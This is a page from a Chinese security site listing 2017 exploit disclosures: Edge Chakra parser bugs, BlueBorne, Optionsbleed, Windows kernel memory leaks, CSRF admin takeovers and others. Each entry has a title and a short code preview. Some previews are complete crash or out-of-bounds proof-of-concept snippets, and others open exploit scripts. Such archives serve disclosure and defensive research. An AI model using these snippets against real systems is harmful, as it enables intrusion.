首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  vsserver
  当前位置:主页>安全文章>文章资料>Exploits>列表
Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'
  日期:2017-09-22 16:02:00 点击:4 评论:0
function f() { { let i; function g() { i; } try { throw 1; } catch ({e = eval('dd')}) { } }} f();
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes
  日期:2017-09-22 16:01:23 点击:3 评论:0
let h = function f(a0 = (function () { a0; a1; a2; a3; a4; a5; a6; a7 = 0x99999; // oob write with ({});})(), a1, a2, a3, a4, a5, a6, a7) { function g() { f; }}; for (let i = 0; i
Microsoft Edge - Chakra Incorrectly Parses Object Patterns
  日期:2017-09-22 16:00:41 点击:4 评论:0
function f() { ({ a: { b = 0x1111, c = 0x2222, }.c = 0x3333 } = {});} f();
Linux Kernel <= 4.13.1 - BlueTooth Buffer Overflow (PoC)
  日期:2017-09-22 15:59:15 点击:6 评论:0
# Exploit Title: BlueBorne - Proof of Concept - Unarmed/Unweaponized -DoS (Crash) only# Date: 09/21/2017# Exploit Author: Marcin Kozlowski # Version: Kernel version v3.3-rc1, and thus affects all version from there on# Tested on: Linux 4.4.0-93-gener
Disk Pulse Enterprise 9.9.16 GET Buffer Overflow
  日期:2017-09-21 16:45:14 点击:4 评论:0
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule 'Disk Pulse Enterprise GET Buffer Overflow', 'Description' => %q( This module exploits an SEH
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bou
  日期:2017-09-20 15:22:30 点击:6 评论:0
Microsoft Edge 38.14393.1066.0 - 'COptionsCollectionCacheItem::GetAt' Out-of-Bounds Read
HPE < 7.2 - Java Deserialization
  日期:2017-09-20 15:19:27 点击:3 评论:0
#!/usr/bin/env python######################################################################################################### # HPE/H3C IMC - Java Deserialization Exploit## Version 0.1# Tested on Windows Server 2008 R2# NameHPE/H3C IMC (Intelligent
Apache - HTTP OPTIONS Memory Leak
  日期:2017-09-19 16:15:09 点击:17 评论:0
#!/usr/bin/env python3 # Optionsbleed proof of concept test# by Hanno Bck import argparseimport urllib3import re def test_bleed(url, args): r = pool.request('OPTIONS', url) try: allow = str(r.headers["Allow"]) except KeyError: return False if allow i
Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memor
  日期:2017-09-19 16:14:22 点击:6 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1307 We have discovered that the win32k!NtQueryCompositionSurfaceBinding system call discloses portions of uninitialized kernel stack memory to user-mode clients, as tested on Window
Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure
  日期:2017-09-19 16:13:22 点击:2 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1304 We have discovered that the win32k!NtGdiDoBanding system call discloses portions of uninitialized kernel stack memory to user-mode clients. More specifically, exactly 8 bytes of
Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclos
  日期:2017-09-19 16:12:37 点击:2 评论:0
Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclos
Microsoft Windows Kernel - 'win32k!NtGdiGetFontResourceInfoInternalW' Stack Memo
  日期:2017-09-19 16:11:59 点击:2 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1275 We have discovered that the nt!NtGdiGetFontResourceInfoInternalW system call discloses portions of uninitialized kernel stack memory to user-mode clients. This is caused by the
Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool
  日期:2017-09-19 16:10:56 点击:2 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1269 We have discovered that the nt!NtRemoveIoCompletion system call handler discloses 4 bytes of uninitialized pool memory to user-mode clients on 64-bit platforms. The bug manifest
Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Mem
  日期:2017-09-19 16:06:10 点击:2 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1268 We have discovered that the nt!NtGdiGetPhysicalMonitorDescription system call discloses portions of uninitialized kernel stack memory to user-mode clients, on Windows 7 to Windo
Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure
  日期:2017-09-19 16:05:28 点击:5 评论:0
/*Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1267 CODE XREF: NtGdiGetGlyphOutline(x,x,x,x,x,x,x,x)+5D.text:0018DD88 push ebx ; size_t.text:0018DD89 push 0 ; int.text:0018DD8B push esi ; void *.text:0018DD8C call _memset--- cut
DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)
  日期:2017-09-19 16:04:16 点击:1 评论:0
#!/usr/local/bin/python# # # # # # Exploit Title: DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/digiaffiliate.asp?id=7# De
Digileave 1.2 - Cross-Site Request Forgery (Update Admin)
  日期:2017-09-19 16:03:21 点击:2 评论:0
#!/usr/local/bin/python# # # # # # Exploit Title: Digileave 1.2 - Cross-Site Request Forgery (Update User & Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/digileave.asp?id=1# Dem
Digirez 3.4 - Cross-Site Request Forgery (Update Admin)
  日期:2017-09-19 16:02:07 点击:1 评论:0
#!/usr/local/bin/python# # # # # # Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)# Dork: N/A# Date: 18.09.2017# Vendor Homepage: http://www.digiappz.com/# Software Link: http://www.digiappz.com/index.asp# Demo: http://w
Netdecision 5.8.2 - Local Privilege Escalation
  日期:2017-09-18 14:59:44 点击:7 评论:0
/*# Exploit Title: Netdecision 5.8.2 - Local Privilege Escalation - Winring0x32.sys# Date: 2017.09.17# Exploit Author: Peter Baris# Vendor Homepage: www.netmechanica.com# Software Link: http://www.netmechanica.com/downloads/ //registration required#
D-Link DIR8xx Routers - Local Firmware Upload
  日期:2017-09-18 14:59:05 点击:4 评论:0
#!/bin/bash # If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart.# E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-li
共578页/11558条记录 首页 上一页 [1] [2] [3] 4 [5] [6] [7] 下一页 末页
  本月热点文章
·Stock Photo Selling 1.0 - SQ
·Apache - HTTP OPTIONS Memory
·Fibaro Home Center 2 - Remot
·NodeJS Debugger Command Inje
·Cash Back Comparison Script
·Dnsmasq < 2.78 - 2-byte Heap
·FLIR Systems FLIR Thermal Ca
·Apache Tomcat < 9.0.1 (Beta)
·Trend Micro OfficeScan Remot
·VX Search Enterprise 10.1.12
·FLIR Systems FLIR Thermal Ca
·Netdecision 5.8.2 - Local Pr
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved